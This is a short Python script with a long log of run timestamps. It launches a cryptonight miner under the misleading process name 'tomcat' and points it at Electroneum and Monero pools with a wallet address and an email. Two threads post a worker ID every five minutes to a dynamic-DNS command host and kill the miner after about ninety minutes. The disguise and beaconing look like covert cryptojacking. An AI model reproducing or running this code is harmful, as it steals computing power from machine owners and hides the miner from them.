import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:14:05.679526
#2018-02-17 17:02:05.300746
#2018-02-17 18:49:01.531457
#2018-02-17 20:38:06.463515
#2018-02-17 22:24:04.455718
#2018-02-18 00:08:05.446310
#2018-02-18 01:59:03.932659
#2018-02-18 03:46:05.560936
#2018-02-18 05:34:03.483425
#2018-02-18 07:27:01.591153
#2018-02-18 09:13:07.613987
#2018-02-18 10:59:06.055305
#2018-02-18 12:46:01.860460
#2018-02-18 14:34:01.523862
#2018-02-18 16:24:06.778810
#2018-02-18 18:13:05.954558
#2018-02-18 19:59:04.144429
#2018-02-18 21:45:07.109438
#2018-02-18 23:34:07.280157
#2018-02-19 01:20:05.649550
#2018-02-19 03:08:06.518740
#2018-02-19 04:53:01.704505
#2018-02-19 06:38:01.915013
#2018-02-19 08:27:01.951748
#2018-02-19 10:16:07.628180
#2018-02-19 12:03:06.007877
#2018-02-19 13:49:05.464176
#2018-02-19 15:37:08.495457
#2018-02-19 17:24:01.966190
#2018-02-19 19:12:04.676550
#2018-02-19 20:59:07.200045
#2018-02-19 22:47:03.678011
#2018-02-20 00:30:09.793358
#2018-02-20 02:18:01.232763
#2018-02-20 04:09:04.906842
#2018-02-20 05:52:01.616274
#2018-02-20 07:38:05.543670
#2018-02-20 09:23:06.464208
#2018-02-20 11:07:03.861708
#2018-02-20 12:53:07.026034
#2018-02-20 14:37:08.083855
#2018-02-20 16:21:05.072289
#2018-02-20 18:07:01.841125
#2018-02-20 19:57:07.432490
#2018-02-20 21:44:01.395971
#2018-02-20 23:24:07.038227
#2018-02-21 01:09:01.840982
#2018-02-21 02:55:01.354434
#2018-02-21 04:44:07.373696
#2018-02-21 06:33:06.228148
#2018-02-21 08:18:07.341140
#2018-02-21 10:05:05.059152
#2018-02-21 11:52:05.309017
#2018-02-21 13:42:05.352082
#2018-02-21 15:26:05.664437
#2018-02-21 17:16:06.846107
#2018-02-21 19:03:08.515798
#2018-02-21 20:51:08.901498
#2018-02-21 22:38:07.456231
#2018-02-22 00:26:06.854753
#2018-02-22 02:13:07.533906
#2018-02-22 03:58:01.624590
#2018-02-22 05:45:03.289434
#2018-02-22 07:32:07.765758
#2018-02-22 09:19:04.545824
#2018-02-22 11:05:09.783337
#2018-02-22 12:51:06.830801
#2018-02-22 14:37:08.280821
#2018-02-22 16:24:04.886681
#2018-02-22 18:11:10.831965
#2018-02-22 20:01:04.040300
#2018-02-22 21:49:11.222817
#2018-02-22 23:38:01.983213
#2018-02-23 01:25:07.744942
#2018-02-23 03:13:05.187992
#2018-02-23 05:00:11.335783
#2018-02-23 06:45:07.230340
#2018-02-23 08:36:09.119608
#2018-02-23 10:51:04.781210
#2018-02-23 12:48:05.610644
#2018-02-23 14:31:05.172673
#2018-02-23 16:20:09.992690
#2018-02-23 18:08:04.028683
#2018-02-23 19:53:02.160091
#2018-02-23 21:36:05.487548
#2018-02-23 23:24:04.452761
#2018-02-24 01:18:03.944944
#2018-02-24 03:11:01.884583
#2018-02-24 04:56:04.869838
#2018-02-24 06:44:01.502724
#2018-02-24 08:32:06.806279
#2018-02-24 10:20:01.495756
#2018-02-24 12:15:04.338951
#2018-02-24 14:06:07.369185
#2018-02-24 15:54:07.130343
#2018-02-24 17:45:10.139957
#2018-02-24 19:31:06.978504
#2018-02-24 21:19:05.346895
#2018-02-24 23:58:02.193877
#2018-02-25 03:14:06.568902
#2018-02-25 07:01:03.872173